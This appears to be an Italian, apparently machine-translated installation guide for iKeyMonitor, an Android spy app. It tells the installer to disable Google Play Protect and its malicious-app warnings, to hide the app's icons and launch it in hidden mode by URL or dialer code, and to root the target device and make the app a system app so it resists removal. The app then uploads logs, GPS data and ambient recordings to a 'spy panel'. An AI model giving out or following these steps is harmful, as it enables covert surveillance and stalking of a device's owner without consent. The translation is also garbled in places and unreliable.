Guida all'installazione iKeyMonitor Android

Prerequisiti

Saltare questo passaggio se non si dispone di installato Google Play (ad esempio: Per i telefoni Cina, Google Play non è installato di default).

Disattiva Google Play Protect

impostazioni > Google > Sicurezza > dispositivo di scansione per le minacce alla sicurezza e Migliorare la rilevazione app dannose (1,2,3)
Impostato "OFF

Disattiva Google Play notifica Protect

• Su 7.x Android
    impostazioni > notifiche > Google Play Store > Blocca tutto (1,2,3)
    Impostato "SOPRA

• Su 8.x Android
    impostazioni > Applicazioni e notifiche > Vedi tutte le applicazioni > Google Play Store > notifiche app > Priorità alta (1,2,3)
    Impostato "OFF

Se è già stato installato iKeyMonitor e visto una notifica “Disinstallare app dannose", poi lungo premendo la notifica e Girare la notifica “OFF“.

INSTALLARE

1. Consentire applicazione installa da “fonti sconosciute”

• Vai a impostazioni > Sicurezza > Tick “Fonti sconosciute

2. Toccare il file scaricato “iKeyMonitor-Android.apk” per installarlo

3. Aprire dopo l'installazione completa

Nota:
Se si sceglie “Fatto”Dopo l'installazione, trovare e toccare l'icona iKeyMonitor sullo schermo del dispositivo per avviare il software.

4 modi per aprire iKeyMonitor:

Subito dopo l'installazione, l'applicazione iKeyMonitor è lanciata e inizia a lavorare in una modalità background. Le icone che appaiono nella schermata iniziale e la barra di notifica possono essere disabilitati da iKeyMonitor Wizard. Visualizza la guida. Per una migliore esperienza utente, ci sono 2 opzioni: o per tenerli visualizzati nella barra schermata iniziale e la notifica del dispositivo monitorato o meno.

1. Visita https://ikeymonitor.com/openapp con il browser del telefono (modalità nascosta)
  2. Dial PIN # 8888 * con il pad di composizione della chiamata (modalità nascosta)
  3. Toccare iKeyMonitor icona sulla barra delle notifiche (Visible Mode)
  4. Toccare iKeyMonitor icona sulla schermata iniziale (Visible Mode)

4. Per dispositivo radicata, l'accesso root Concessione iKeyMonitor e convertirlo sistema App

• Per dispositivo radicata, concedere iKeyMonitor accesso root e cambiamento notifiche a Disabilitato in Supersu/superuser.

Alternativa: Se Magisk è installato per sradicare il dispositivo di destinazione, in magia > In alto a sinistra del menu > impostazioni > superuser Notifiche, Selezionare “Nessuna”Per disattivare la notifica.

• Per dispositivo radicata, convertire iKeyMonitor al sistema di app dalla iKeyMonitor - impostazioni per rendere più difficile ad essere uccisi o disinstallato. Riavviare il dispositivo dopo la conversione.

CONFIGURAZIONE

1. Enable "Internet/Network Service" in "Accessibility Service" and "Usage Access"

• Dopo aver effettuato l'accesso, seguire i dialoghi popup per consentire iKeyMonitor in servizio di accessibilità, di accesso e di utilizzo della batteria Optimization.

3. Impostazioni essenziale per mantenere iKeyMonitor in esecuzione in background

• iKeyMonitor può essere disabilitata / ucciso da Power Saver o Task Cleaner del sistema Android, se non si configurano le impostazioni essenziali.
  • Visualizzare le impostazioni essenziali Now!

• Go to "Device Management", check if your device is connected to the spy panel and view logs after some minutes.
  • iKeyMonitor carica tutti i registri ogni 5 minuti quando lo schermo del dispositivo è acceso. Quando lo schermo è spento (il telefono in standby), solo GPS e tronchi circostanti saranno caricati.
  • Controllare la Guida per l'utente e FAQ se avete domande.